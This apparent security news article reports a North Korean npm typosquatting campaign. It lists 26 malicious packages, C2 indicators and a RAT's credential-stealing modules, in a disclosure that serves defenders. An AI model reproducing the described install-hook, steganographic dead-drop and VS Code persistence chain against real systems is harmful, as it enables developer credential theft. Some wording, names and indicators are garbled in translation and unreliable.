Cybersecurity researchers have revealed a new iteration of the ongoing Contagion Interview campaign. In this campaign, North Korean threat actors published a set of 26 malicious packages to the npm registry.
Although these packages pose as developer tools, they contain the ability to use seemingly innocuous Pastebin content as a dead drop resolver to extract actual command and control (C2) and ultimately drop credential stealers and remote access Trojans targeting developers. C2 infrastructure is hosted on Vercel across 31 deployments.
The campaign is being tracked by Kieran Miyamoto of Socket and kmsec.uk and is tracked under the name StegaBin.
“The loader extracts a steganographically encoded C2 URL within the three Pastebin pastes, which is an innocuous computer science essay with evenly spaced characters replaced, detailing the hidden infrastructure address,” said socket researchers Philipp Burckhardt and Peter van der Zee.
Here is a list of malicious npm packages:
argonist@0.41.0 bcryptance@6.5.2 bee-quarl@2.1.2 bubble-core@6.26.2 corstoken@2.14.7 daytonjs@1.11.20 ether-lint@5.9.4 expressjs-lint@5.3.2 fastify-lint@5.8.0 formmiderable@3.5.7 hapi-lint@19.1.2 iosysredis@5.13.2 jslint-config@10.22.2 jsnwebapptoken@8.40.2 kafkajs-lint@2.21.3 loadash-lint@4.17.24 mqttoken@5.40.2 prism-lint@7.4.2 promanage@6.0.21 sequelization@6.40.2 typoriem@0.4.17 undicy-lint@7.23.1 uuindex@13.1.0 vitetest-lint@4.1.21 windowston@3.19.2 zoddle@4.4.2
All identified packages come with an installation script (‘install.js’) that is automatically executed during package installation, which executes the malicious payload located at ‘vendor/scrypt-js/version.js’. Another commonality in integrating the 26 packages is that they explicitly declare the canonical packages they are typosquatting as dependencies to appear trustworthy.
The payload acts as a text steganography decoder by accessing the Pastebin URL and extracting its contents to obtain the actual C2 Vercel URL. Although the paste appears to contain an innocuous essay about computer science, the decoder is designed to look at specific characters in specific positions within the text and string them together to create a list of C2 domains.
“The decoder removes zero-width Unicode characters, reads five-digit long markers from the beginning, calculates evenly spaced character positions throughout the text, and extracts the character at that position,” Socket said. “The extracted characters are split on the ||| delimiter (with an ===END=== ending marker) to produce an array of C2 domain names.”
The malware then accesses the decoded domain to obtain platform-specific payloads for Windows, macOS, and Linux. This is a tactic widely observed in the Contagious Interview campaign. One such domain is “ext-checkdin.vercel”[.]app” serves a shell script that accesses the same URL to retrieve the RAT components.
Trojan connects to 103.106.67[.]63:1244 Waits for further instructions to allow changing the current directory and running shell commands. This deploys a comprehensive intelligence collection suite. It includes nine modules that facilitate Microsoft Visual Studio Code (VS Code) persistence, keylogging and clipboard theft, browser credential collection, TruffleHog secret scanning, and Git repository and SSH key disclosure.
vs leverages the runOn: “folderOpen” trigger to access the Vercel domain using a malicious task.json file every time a project is opened in VS Code. This module specifically scans the victim’s VS Code config directory across all three platforms and directly writes the malicious task.json there. Clip acts as a keylogger, mouse tracker, and clipboard stealer that supports active window tracking and performs periodic extractions every 10 minutes. bro, this is a Python payload for stealing the browser’s credential store. j is a Node.js module used for browser and cryptocurrency theft targeting Google Chrome, Brave, Firefox, Opera, Microsoft Edge, and extensions such as MetaMask, Phantom, Coinbase Wallet, Binance, Trust, Exodus, and Keplr. On macOS, this also includes iCloud Keychain. z enumerates the file system and steals files that match certain predefined patterns. n acts as a RAT, giving attackers the ability to remotely control infected hosts in real time via a persistent WebSocket connection to 103.106.67.[.]63:1247 and extract the desired data via FTP. truffle downloads the genuine TruffleHog secret scanner from the official GitHub page to discover and extract developer secrets. git. Collects files from .ssh directories, extracts Git credentials, and scans repositories. sched. This is the same as “vendor/scrypt-js/version.js” and will be redeployed as a persistence mechanism.
“While previous waves of Contagious Interview campaigns relied on relatively simple malicious scripts and Bitbucket-hosted payloads, this latest iteration demonstrates a concerted effort to evade both automated detection and human review,” Socket concluded.
“Pastebin’s use of character-level steganography and multi-stage Vercel routing indicates that attackers are looking to improve their evasion techniques and make their operations more resilient.”
This disclosure comes amid observations that North Korean threat actors are also publishing malicious npm packages (such as express-core-validator) to obtain next-stage JavaScript payloads hosted on Google Drive.
“Only one package has been released using this new technology,” Miyamoto said. “FAMOUS CHOLLIMA will likely continue leveraging multiple technologies and infrastructure to deliver subsequent payloads. It is unlikely that this represents a complete overhaul of stager operations at npm.”
Source link
